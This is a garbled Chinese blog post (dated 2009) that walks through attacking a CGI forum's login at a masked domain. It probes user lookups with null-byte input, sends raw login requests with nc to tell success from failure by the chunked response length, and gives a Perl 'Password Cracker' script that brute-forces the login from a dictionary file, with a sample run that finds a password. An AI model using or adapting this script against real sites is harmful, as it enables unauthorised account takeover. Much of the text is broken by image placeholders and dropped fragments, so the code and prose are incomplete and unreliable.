分镜头脚本实例:脚本攻击例子来源: 发布时间:星期六, 2009年9月12日 浏览:231次 评论:0
![]() 今天闲着无聊 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 2、准备/分析 安全第 ![]() ![]() ![]() ![]() ![]() ![]() 打开页面 ![]() ![]() ![]() <form action="login.cgi" method="post"> <input type="hidden" name="menu" value="login"> <input type="hidden" name="id" value=""> 用户名:<input size="25" name="username" ![]() 密 码:<input type="password" size="25" value name="userpsd" ![]() </form> 所以 ![]() ![]() 习惯先查看用户信息 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=silkroad 返回正常用户信息 http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=./silkroad 同样返回正常用户信息 ![]() http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=silkroad%00 提示此用户没有被注册 :( 扫描看看 ![]() ![]() 回到CGI上 ![]() ![]() ![]() ![]() ![]() ![]() ![]() http://www.****bbs.com/photo.cgi可以上传头像 由于头像 ![]() 关键就在***这里 ![]() ![]() 在要上传 ![]() ![]() ![]() ![]() ![]() ![]() ![]() 换个角度来看 ![]() ![]() ![]() ![]() ![]() 当然社区上 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 密码探测 ![]() ![]() ①取得预进行猜测 ![]() | | | ②向目标依次提交密码 <--------- | | | | | | ③根据目标 ![]() | | | | | | | | | 密码正确 密码 ![]() | | | | | | | | | 返回给用户密码 Next----------------- 第 3步要绕个圈子 ![]() ![]() ![]() ![]() 所以先从第 3步开始: 我不了解别 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 所以 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 现在用telnet去取得我们想要 ![]() F:\>nc -vv www.****bbs.com 80 <<<-----用nc连接目标WEB服务 ![]() ![]() ![]() Warning: inverse host lookup failed for ***.***.***.***: h_errno 11004: NO_DATA www.****bbs.com [***.***.***.***] 80 (http) open GET http://www.****bbs.com/login.cgi?username=asdfasdf&userpsd=error&menu=login&id= HTTP/1.1 <Enter> <<<-------这里用到前面提到 ![]() ![]() ![]() ![]() ![]() host:iis-server <Enter><Enter> HTTP/1.1 200 OK Date: Mon, 18 Aug 2003 11:59:41 GMT Server: Apache/1.3.26 (Unix) PHP/4.0.6 Transfer-Encoding: chunked Content-Type: text/html fe7 <<<------------注意这个 <html> <head> <meta http-equiv=Content-Type content=text/html; char ![]() <link REL="SHORTCUT ICON" href=http://www.****bbs.com/pic/ybb.ico> ...... 这个是非成功登陆后返回 ![]() 再来: F:\>nc -vv www.****bbs.com 80 Warning: inverse host lookup failed for ***.***.***.***: h_errno 11004: NO_DATA www.****bbs.com [***.***.***.***] 80 (http) open GET http://www.****bbs.com/login.cgi?username=asdfasdf&userpsd=asdfasdf&menu=login&id= HTTP/1.1 <<<-------这次用 ![]() ![]() host:iis-server HTTP/1.1 200 OK Date: Mon, 18 Aug 2003 12:09:43 GMT Server: Apache/1.3.26 (Unix) PHP/4.0.6 Transfer-Encoding: chunked Content-Type: text/html 18d <<<------------注意这个 <html><head><meta http-equiv=Content-Type content=text/html; char ![]() <SCRIPT> expireDate= ![]() expireDate. ![]() ![]() ...... 这个是成功登陆后返回 ![]() 返回 ![]() ![]() ![]() 现在到社区 ![]() ![]() ![]() ![]() ![]() 3、 ![]() 思路(步骤): 取得IP ---> 打开字典 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() #!/usr/bin/perl ################################# #Password Cracker #Author:HBU-the0crat #E-mail:[email protected] #Date:2003/8/18 ################################# use Socket; #使用Socket模块 my $ARGC=@ARGV; #取得参数 ![]() ![]() ![]() my $host=sh ![]() pr ![]() open(FH,"<dic.dic"); #挂字典 while(<FH>) #读取字典 { chomp; my $pwd=$_; my $req="GET http://www.****bbs.com/login.cgi?username=asdfasdf&userpsd=$pwd&menu=login&id= HTTP/1.1\n"."host:iis-server\n\n"; #提交 ![]() my @res=sendraw($req); #将目标服务器返回 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() {pr ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() { pr ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() close(FH); exit; #探测到正确密码立刻退出 } } #对比判断是否登陆成功 ![]() close(FH); sub sendraw { my ($req2) = @_; my $target; $target = inet_aton($host) or die "\ninet_aton problems"; #转换目标IP ![]() ![]() ![]() select(Handle); $| = 1; pr ![]() my @res2 = <Handle>; #取得目标服务器返回 ![]() select(STDOUT); close(Handle); ![]() ![]() ![]() ![]() ![]() } ![]() die("\nCan't connect to $host:80...\n"); } } 4、演示 dic.dic内容如下: asdf asdfasdf asdfa 运行这个脚本(win2k+activeperl5.6下通过) C:\>cracker.pl www.****bbs.com Sending... pwd:asdf error pwd:asdfasdf passed ![]() 注意要根据实际情况更改提交 ![]() ![]() 挂个字典 ![]() ![]() ![]() 5、整理总结 弊:这段代码用 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 利:这种思路方法比较有效, 但也是比较没有效率 ![]() ![]() ![]() ![]() ![]() 0
相关文章读者评论发表评论 |